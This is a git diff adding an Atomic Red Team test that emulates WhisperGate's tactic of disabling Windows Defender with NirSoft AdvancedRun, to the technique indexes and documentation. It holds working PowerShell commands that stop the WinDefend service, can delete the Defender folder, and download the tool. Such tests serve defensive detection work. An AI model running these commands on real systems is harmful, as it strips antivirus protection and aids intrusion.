diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index ea088629..c5d5a7c4 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -408,6 +408,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhis
defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,29,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 45112cd3..6b95d072 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -269,6 +269,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defende
defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,29,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 108378e2..987427a1 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -640,6 +640,7 @@
- Atomic Test #26: Disable Windows Defender with DISM [windows]
- Atomic Test #27: Disable Defender with Defender Control [windows]
- Atomic Test #28: Disable Windows Defender Tamper Protection [windows]
+ - Atomic Test #29: Disable Defender Using NirSoft AdvancedRun [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 11caa5f8..8c87acaa 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -445,6 +445,7 @@
- Atomic Test #26: Disable Windows Defender with DISM [windows]
- Atomic Test #27: Disable Defender with Defender Control [windows]
- Atomic Test #28: Disable Windows Defender Tamper Protection [windows]
+ - Atomic Test #29: Disable Defender Using NirSoft AdvancedRun [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index c443f080..12f31568 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -27089,6 +27089,50 @@ defense-evasion:
cleanup_command: Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Defender\Feature' -name 'TamperData' -value 1
name: powershell
+ - name: Disable Defender Using NirSoft AdvancedRun
+ auto_generated_guid: 81ce22fd-9612-4154-918e-8a1f285d214d
+ description: "Information on NirSoft AdvancedRun and its creators found here:
+ http://www.nirsoft.net/utils/advanced_run.html\nThis Atomic will run AdvancedRun.exe
+ with similar behavior identified during the WhisperGate campaign.\nSee https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3\nUpon
+ successful execution, AdvancedRun.exe will attempt to run and stop Defender,
+ and optionally attempt to delete the Defender folder on disk. \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ AdvancedRun_Location:
+ description: Path of Advanced Run executable
+ type: Path
+ default: "$env:temp\\AdvancedRun.exe"
+ delete_defender_folder:
+ description: Set to 1 to also delete the Windows Defender folder
+ type: Integer
+ default: 0
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Advancedrun.exe must exist at #{AdvancedRun_Location}
+
+'
+ prereq_command: 'if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else
+ {exit 1}
+
+'
+ get_prereq_command: |
+ Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip"
+ Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force
+ executor:
+ command: |
+ Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
+ if(#{delete_defender_folder}){
+ $CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
+ Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
+ }
+ cleanup_command: 'Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe"
+ /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs
+ 8 /Run} Catch{}
+
+'
+ name: powershell
+ elevation_required: true
T1078.002:
technique:
object_marking_refs:
diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md
index 28c0d149..dd4a4a52 100644
--- a/atomics/T1562.001/T1562.001.md
+++ b/atomics/T1562.001/T1562.001.md
@@ -62,6 +62,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too
- [Atomic Test #28 - Disable Windows Defender Tamper Protection](#atomic-test-28---disable-windows-defender-tamper-protection)
+- [Atomic Test #29 - Disable Defender Using NirSoft AdvancedRun](#atomic-test-29---disable-defender-using-nirsoft-advancedrun)
+
@@ -1186,4 +1188,62 @@ Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft
+
+
+
+## Atomic Test #29 - Disable Defender Using NirSoft AdvancedRun
+Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html
+This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
+See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3
+Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 81ce22fd-9612-4154-918e-8a1f285d214d
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| AdvancedRun_Location | Path of Advanced Run executable | Path | $env:temp\AdvancedRun.exe|
+| delete_defender_folder | Set to 1 to also delete the Windows Defender folder | Integer | 0|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
+if(#{delete_defender_folder}){
+ $CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
+ Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
+}
+```
+
+#### Cleanup Commands:
+```powershell
+Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Advancedrun.exe must exist at #{AdvancedRun_Location}
+##### Check Prereq Commands:
+```powershell
+if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip"
+Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force
+```
+
+
+
+